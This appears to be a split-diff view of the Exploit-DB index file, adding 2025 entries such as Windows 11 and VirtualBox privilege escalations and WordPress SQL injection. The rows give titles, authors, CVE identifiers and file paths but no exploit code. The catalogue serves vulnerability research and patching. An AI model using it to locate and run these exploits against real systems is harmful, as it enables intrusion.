2237,exploits/multiple/remote/2237.sh,"Apache < 1.3.37/2.0.59/2.2.3 mod_rewrite - Remote Overflow",2006-08-21,"Jacobo Avariento",remote,multiple,,2006-08-20,2016-10-27,1,OSVDB-27588;CVE-2006-3747,,,,http://www.exploit-db.comapache_2.0.58-win32-x86-no_ssl.msi, 2237,exploits/multiple/remote/2237.sh,"Apache < 1.3.37/2.0.59/2.2.3 mod_rewrite - Remote Overflow",2006-08-21,"Jacobo Avariento",remote,multiple,,2006-08-20,2016-10-27,1,OSVDB-27588;CVE-2006-3747,,,,http://www.exploit-db.comapache_2.0.58-win32-x86-no_ssl.msi,
33868,exploits/multiple/remote/33868.txt,"Apache ActiveMQ 5.2/5.3 - Source Code Information Disclosure",2010-04-22,"Veerendra G.G",remote,multiple,,2010-04-22,2014-06-25,1,CVE-2010-1587;OSVDB-64020,,,,,https://www.securityfocus.com/bid/39636/info 33868,exploits/multiple/remote/33868.txt,"Apache ActiveMQ 5.2/5.3 - Source Code Information Disclosure",2010-04-22,"Veerendra G.G",remote,multiple,,2010-04-22,2014-06-25,1,CVE-2010-1587;OSVDB-64020,,,,,https://www.securityfocus.com/bid/39636/info
33905,exploits/multiple/remote/33905.txt,"Apache ActiveMQ 5.3 - 'admin/queueBrowse' Cross-Site Scripting",2010-04-28,"arun kethipelly",remote,multiple,,2010-04-28,2014-06-28,1,,,,,,https://www.securityfocus.com/bid/39771/info 33905,exploits/multiple/remote/33905.txt,"Apache ActiveMQ 5.3 - 'admin/queueBrowse' Cross-Site Scripting",2010-04-28,"arun kethipelly",remote,multiple,,2010-04-28,2014-06-28,1,,,,,,https://www.securityfocus.com/bid/39771/info
52288,exploits/multiple/remote/52288.py,"Apache ActiveMQ 6.1.6 - Denial of Service (DOS)",2025-05-09,"Abdualhadi khalifa",remote,multiple,,2025-05-09,2025-05-09,0,CVE-2025-27533,,,,,
50829,exploits/multiple/remote/50829.py,"Apache APISIX 2.12.1 - Remote Code Execution (RCE)",2022-03-16,Ven3xy,remote,multiple,,2022-03-16,2022-03-16,0,CVE-2022-24112,,,,, 50829,exploits/multiple/remote/50829.py,"Apache APISIX 2.12.1 - Remote Code Execution (RCE)",2022-03-16,Ven3xy,remote,multiple,,2022-03-16,2022-03-16,0,CVE-2022-24112,,,,,
29930,exploits/multiple/remote/29930.txt,"Apache AXIS 1.0 - Non-Existent WSDL Path Information Disclosure",2007-04-27,jericho+bblog@attrition.org,remote,multiple,,2007-04-27,2013-11-30,1,CVE-2007-2353;OSVDB-34154,,,,,https://www.securityfocus.com/bid/23687/info 29930,exploits/multiple/remote/29930.txt,"Apache AXIS 1.0 - Non-Existent WSDL Path Information Disclosure",2007-04-27,jericho+bblog@attrition.org,remote,multiple,,2007-04-27,2013-11-30,1,CVE-2007-2353;OSVDB-34154,,,,,https://www.securityfocus.com/bid/23687/info
46682,exploits/multiple/remote/46682.py,"Apache Axis 1.4 - Remote Code Execution",2019-04-09,"David Yesland",remote,multiple,,2019-04-09,2019-04-09,0,CVE-2019-0227,,,,,https://github.com/RhinoSecurityLabs/CVEs/blob/d5d317bb211af59d0708fd602d83bd80b61ae37b/CVE-2019-0227/CVE-2019-0227.py 46682,exploits/multiple/remote/46682.py,"Apache Axis 1.4 - Remote Code Execution",2019-04-09,"David Yesland",remote,multiple,,2019-04-09,2019-04-09,0,CVE-2019-0227,,,,,https://github.com/RhinoSecurityLabs/CVEs/blob/d5d317bb211af59d0708fd602d83bd80b61ae37b/CVE-2019-0227/CVE-2019-0227.py
@ -12403,6 +12404,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
35214,exploits/multiple/webapps/35214.txt,"Subex Fms 7.4 - SQL Injection",2014-11-11,"Anastasios Monachos",webapps,multiple,,2014-11-17,2014-11-17,0,CVE-2014-8728;OSVDB-110747,,,,, 35214,exploits/multiple/webapps/35214.txt,"Subex Fms 7.4 - SQL Injection",2014-11-11,"Anastasios Monachos",webapps,multiple,,2014-11-17,2014-11-17,0,CVE-2014-8728;OSVDB-110747,,,,,
51340,exploits/multiple/webapps/51340.txt,"Suprema BioStar 2 v2.8.16 - SQL Injection",2023-04-08,"Yuriy (Vander) Tsarenko",webapps,multiple,,2023-04-08,2023-04-08,0,CVE-2023-27167,,,,, 51340,exploits/multiple/webapps/51340.txt,"Suprema BioStar 2 v2.8.16 - SQL Injection",2023-04-08,"Yuriy (Vander) Tsarenko",webapps,multiple,,2023-04-08,2023-04-08,0,CVE-2023-27167,,,,,
51804,exploits/multiple/webapps/51804.txt,"SureMDM On-premise < 6.31 - CAPTCHA Bypass User Enumeration",2024-02-19,"Jonas Benjamin Friedli",webapps,multiple,,2024-02-19,2024-02-19,0,CVE-2023-3897,,,,, 51804,exploits/multiple/webapps/51804.txt,"SureMDM On-premise < 6.31 - CAPTCHA Bypass User Enumeration",2024-02-19,"Jonas Benjamin Friedli",webapps,multiple,,2024-02-19,2024-02-19,0,CVE-2023-3897,,,,,
52286,exploits/multiple/webapps/52286.txt,"SureTriggers OttoKit Plugin 1.0.82 - Privilege Escalation",2025-05-09,"Abdualhadi khalifa",webapps,multiple,,2025-05-09,2025-05-09,0,CVE-2025-27007,,,,,https://github.com/absholi7ly/CVE-2025-27007-OttoKit-exploit/
50937,exploits/multiple/webapps/50937.txt,"Survey Sparrow Enterprise Survey Software 2022 - Stored Cross-Site Scripting (XSS)",2022-05-17,"Pankaj Kumar Thakur",webapps,multiple,,2022-05-17,2022-05-17,0,CVE-2022-29727,,,,, 50937,exploits/multiple/webapps/50937.txt,"Survey Sparrow Enterprise Survey Software 2022 - Stored Cross-Site Scripting (XSS)",2022-05-17,"Pankaj Kumar Thakur",webapps,multiple,,2022-05-17,2022-05-17,0,CVE-2022-29727,,,,,
37470,exploits/multiple/webapps/37470.txt,"SWFupload - 'movieName' Cross-Site Scripting",2012-06-29,"Nathan Partlan",webapps,multiple,,2012-06-29,2015-07-03,1,CVE-2012-3414;OSVDB-83413,,,,,https://www.securityfocus.com/bid/54245/info 37470,exploits/multiple/webapps/37470.txt,"SWFupload - 'movieName' Cross-Site Scripting",2012-06-29,"Nathan Partlan",webapps,multiple,,2012-06-29,2015-07-03,1,CVE-2012-3414;OSVDB-83413,,,,,https://www.securityfocus.com/bid/54245/info
35908,exploits/multiple/webapps/35908.txt,"SWFupload 2.5.0 - Cross Frame Scripting (XFS)",2015-01-26,MindCracker,webapps,multiple,,2015-01-26,2015-01-26,0,OSVDB-117564,,,,, 35908,exploits/multiple/webapps/35908.txt,"SWFupload 2.5.0 - Cross Frame Scripting (XFS)",2015-01-26,MindCracker,webapps,multiple,,2015-01-26,2015-01-26,0,OSVDB-117564,,,,,
@ -12491,6 +12493,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
51805,exploits/multiple/webapps/51805.py,"Wondercms 4.3.2 - XSS to RCE",2024-02-19,"Anas Zakir",webapps,multiple,,2024-02-19,2024-02-19,0,,,,,, 51805,exploits/multiple/webapps/51805.py,"Wondercms 4.3.2 - XSS to RCE",2024-02-19,"Anas Zakir",webapps,multiple,,2024-02-19,2024-02-19,0,,,,,,
52248,exploits/multiple/webapps/52248.txt,"WooCommerce Customers Manager 29.4 - Post-Authenticated SQL Injection",2025-04-16,"Ivan Spiridonov",webapps,multiple,,2025-04-16,2025-04-16,0,CVE-2024-0399,,,,, 52248,exploits/multiple/webapps/52248.txt,"WooCommerce Customers Manager 29.4 - Post-Authenticated SQL Injection",2025-04-16,"Ivan Spiridonov",webapps,multiple,,2025-04-16,2025-04-16,0,CVE-2024-0399,,,,,
47690,exploits/multiple/webapps/47690.md,"WordPress Core < 5.2.3 - Viewing Unauthenticated/Password/Private Posts",2019-10-14,"Sebastian Neef",webapps,multiple,,2019-11-19,2019-11-19,0,CVE-2019-17671,,,,,https://0day.work/proof-of-concept-for-wordpress-5-2-3-viewing-unauthenticated-posts/ 47690,exploits/multiple/webapps/47690.md,"WordPress Core < 5.2.3 - Viewing Unauthenticated/Password/Private Posts",2019-10-14,"Sebastian Neef",webapps,multiple,,2019-11-19,2019-11-19,0,CVE-2019-17671,,,,,https://0day.work/proof-of-concept-for-wordpress-5-2-3-viewing-unauthenticated-posts/
52285,exploits/multiple/webapps/52285.py,"WordPress Depicter Plugin 3.6.1 - SQL Injection",2025-05-09,"Andrew Long",webapps,multiple,,2025-05-09,2025-05-09,0,CVE-2025-2011,,,,,https://github.com/datagoboom/CVE-2025-2011
49189,exploits/multiple/webapps/49189.txt,"Wordpress Plugin Canto 1.3.0 - Blind SSRF (Unauthenticated)",2020-12-04,"Pankaj Verma",webapps,multiple,,2020-12-04,2020-12-04,0,CVE-2020-28976;CVE-2020-28977;CVE-2020-28978,,,,, 49189,exploits/multiple/webapps/49189.txt,"Wordpress Plugin Canto 1.3.0 - Blind SSRF (Unauthenticated)",2020-12-04,"Pankaj Verma",webapps,multiple,,2020-12-04,2020-12-04,0,CVE-2020-28976;CVE-2020-28977;CVE-2020-28978,,,,,
48919,exploits/multiple/webapps/48919.txt,"WordPress Plugin Colorbox Lightbox v1.1.1 - Persistent Cross-Site Scripting (Authenticated)",2020-10-20,n1x_,webapps,multiple,,2020-10-20,2020-10-20,0,,,,,, 48919,exploits/multiple/webapps/48919.txt,"WordPress Plugin Colorbox Lightbox v1.1.1 - Persistent Cross-Site Scripting (Authenticated)",2020-10-20,n1x_,webapps,multiple,,2020-10-20,2020-10-20,0,,,,,,
36930,exploits/multiple/webapps/36930.txt,"WordPress Plugin Freshmail 1.5.8 - SQL Injection",2015-05-07,"Felipe Molina",webapps,multiple,,2015-05-07,2015-05-07,0,OSVDB-121843,"WordPress Plugin",,,http://www.exploit-db.comfreshmail-newsletter.1.5.8.zip, 36930,exploits/multiple/webapps/36930.txt,"WordPress Plugin Freshmail 1.5.8 - SQL Injection",2015-05-07,"Felipe Molina",webapps,multiple,,2015-05-07,2015-05-07,0,OSVDB-121843,"WordPress Plugin",,,http://www.exploit-db.comfreshmail-newsletter.1.5.8.zip,
@ -41282,6 +41285,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
51733,exploits/windows/local/51733.txt,"Microsoft Windows 11 - 'apds.dll' DLL hijacking (Forced)",2023-10-09,"Moein Shahabi",local,windows,,2023-10-09,2023-10-09,0,,,,,, 51733,exploits/windows/local/51733.txt,"Microsoft Windows 11 - 'apds.dll' DLL hijacking (Forced)",2023-10-09,"Moein Shahabi",local,windows,,2023-10-09,2023-10-09,0,,,,,,
52275,exploits/windows/local/52275.c,"Microsoft Windows 11 - Kernel Privilege Escalation",2025-04-22,"Milad karimi",local,windows,,2025-04-22,2025-04-22,0,CVE-2024-21338,,,,, 52275,exploits/windows/local/52275.c,"Microsoft Windows 11 - Kernel Privilege Escalation",2025-04-22,"Milad karimi",local,windows,,2025-04-22,2025-04-22,0,CVE-2024-21338,,,,,
52270,exploits/windows/local/52270.c,"Microsoft Windows 11 23h2 - CLFS.sys Elevation of Privilege",2025-04-22,"Milad karimi",local,windows,,2025-04-22,2025-04-22,0,CVE-2024-49138,,,,, 52270,exploits/windows/local/52270.c,"Microsoft Windows 11 23h2 - CLFS.sys Elevation of Privilege",2025-04-22,"Milad karimi",local,windows,,2025-04-22,2025-04-22,0,CVE-2024-49138,,,,,
52284,exploits/windows/local/52284.C++,"Microsoft Windows 11 Pro 23H2 - Ancillary Function Driver for WinSock Privilege Escalation",2025-05-09,"Milad karimi",local,windows,,2025-05-09,2025-05-09,0,CVE-2024-38193,,,,,
40219,exploits/windows/local/40219.txt,"Microsoft Windows 7 (x86/x64) - Group Policy Privilege Escalation (MS16-072)",2016-08-08,"Nabeel Ahmed",local,windows,,2016-08-08,2016-08-08,1,CVE-2016-3223;MS16-072,,,,, 40219,exploits/windows/local/40219.txt,"Microsoft Windows 7 (x86/x64) - Group Policy Privilege Escalation (MS16-072)",2016-08-08,"Nabeel Ahmed",local,windows,,2016-08-08,2016-08-08,1,CVE-2016-3223;MS16-072,,,,,
14733,exploits/windows/local/14733.c,"Microsoft Windows 7 - 'wab32res.dll wab.exe' DLL Hijacking",2010-08-24,TheLeader,local,windows,,2010-08-25,2010-08-25,0,CVE-2010-3147;OSVDB-67553;CVE-2010-3143;OSVDB-67499,,,,, 14733,exploits/windows/local/14733.c,"Microsoft Windows 7 - 'wab32res.dll wab.exe' DLL Hijacking",2010-08-24,TheLeader,local,windows,,2010-08-25,2010-08-25,0,CVE-2010-3147;OSVDB-67553;CVE-2010-3143;OSVDB-67499,,,,,
39788,exploits/windows/local/39788.txt,"Microsoft Windows 7 - 'WebDAV' Local Privilege Escalation (MS16-016) (2)",2016-05-09,hex0r,local,windows,,2016-05-09,2016-10-10,1,CVE-2016-0051;MS16-016,,,http://www.exploit-db.com/screenshots/idlt40000/eop2.png,, 39788,exploits/windows/local/39788.txt,"Microsoft Windows 7 - 'WebDAV' Local Privilege Escalation (MS16-016) (2)",2016-05-09,hex0r,local,windows,,2016-05-09,2016-10-10,1,CVE-2016-0051;MS16-016,,,http://www.exploit-db.com/screenshots/idlt40000/eop2.png,,
@ -42178,6 +42182,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
42425,exploits/windows/local/42425.txt,"VirtualBox 5.1.22 - Windows Process DLL Signature Bypass Privilege Escalation",2017-08-03,"Google Security Research",local,windows,,2017-08-03,2017-08-03,1,CVE-2017-10204,Local,,,,https://bugs.chromium.org/p/project-zero/issues/detail?id=1257 42425,exploits/windows/local/42425.txt,"VirtualBox 5.1.22 - Windows Process DLL Signature Bypass Privilege Escalation",2017-08-03,"Google Security Research",local,windows,,2017-08-03,2017-08-03,1,CVE-2017-10204,Local,,,,https://bugs.chromium.org/p/project-zero/issues/detail?id=1257
42426,exploits/windows/local/42426.txt,"VirtualBox 5.1.22 - Windows Process DLL UNC Path Signature Bypass Privilege Escalation",2017-08-03,"Google Security Research",local,windows,,2017-08-03,2017-08-03,1,CVE-2017-10129,Local,,,,https://bugs.chromium.org/p/project-zero/issues/detail?id=1296 42426,exploits/windows/local/42426.txt,"VirtualBox 5.1.22 - Windows Process DLL UNC Path Signature Bypass Privilege Escalation",2017-08-03,"Google Security Research",local,windows,,2017-08-03,2017-08-03,1,CVE-2017-10129,Local,,,,https://bugs.chromium.org/p/project-zero/issues/detail?id=1296
46747,exploits/windows/local/46747.txt,"VirtualBox 6.0.4 r128413 - COM RPC Interface Code Injection Host Privilege Escalation",2019-04-24,"Google Security Research",local,windows,,2019-04-24,2019-04-24,1,CVE-2019-2721,Local,,,,https://bugs.chromium.org/p/project-zero/issues/detail?id=1811 46747,exploits/windows/local/46747.txt,"VirtualBox 6.0.4 r128413 - COM RPC Interface Code Injection Host Privilege Escalation",2019-04-24,"Google Security Research",local,windows,,2019-04-24,2019-04-24,1,CVE-2019-2721,Local,,,,https://bugs.chromium.org/p/project-zero/issues/detail?id=1811
52287,exploits/windows/local/52287.C++,"VirtualBox 7.0.16 - Privilege Escalation",2025-05-09,"Milad karimi",local,windows,,2025-05-09,2025-05-09,0,CVE-2024-21111,,,,,
24910,exploits/windows/local/24910.txt,"VirtualDJ Pro/Home 7.3 - Local Buffer Overflow",2013-04-02,"Alexandro Sánchez Bach",local,windows,,2013-04-02,2013-04-07,1,OSVDB-92085,,,,http://www.exploit-db.cominstall_virtualdj_home_v7.3.exe, 24910,exploits/windows/local/24910.txt,"VirtualDJ Pro/Home 7.3 - Local Buffer Overflow",2013-04-02,"Alexandro Sánchez Bach",local,windows,,2013-04-02,2013-04-07,1,OSVDB-92085,,,,http://www.exploit-db.cominstall_virtualdj_home_v7.3.exe,
10920,exploits/windows/local/10920.cpp,"VirtualDJ Trial 6.0.6 'New Year Edition' - '.m3u' Local Overflow",2010-01-02,"fl0 fl0w",local,windows,,2010-01-01,2017-11-16,1,,,,,http://www.exploit-db.comvirtualdj_trial_v6.0.6_newyearedition.exe, 10920,exploits/windows/local/10920.cpp,"VirtualDJ Trial 6.0.6 'New Year Edition' - '.m3u' Local Overflow",2010-01-02,"fl0 fl0w",local,windows,,2010-01-01,2017-11-16,1,,,,,http://www.exploit-db.comvirtualdj_trial_v6.0.6_newyearedition.exe,
16070,exploits/windows/local/16070.py,"Virtuosa Phoenix Edition 5.2 - ASX Buffer Overflow (SEH)",2011-01-28,Acidgen,local,windows,,2011-01-28,2011-01-28,1,OSVDB-70695,,,http://www.exploit-db.com/screenshots/idlt16500/screen-shot-2011-01-28-at-122113-pm.png,http://www.exploit-db.comVirtuosaTrial.exe, 16070,exploits/windows/local/16070.py,"Virtuosa Phoenix Edition 5.2 - ASX Buffer Overflow (SEH)",2011-01-28,Acidgen,local,windows,,2011-01-28,2011-01-28,1,OSVDB-70695,,,http://www.exploit-db.com/screenshots/idlt16500/screen-shot-2011-01-28-at-122113-pm.png,http://www.exploit-db.comVirtuosaTrial.exe,

Can't render this file because it is too large.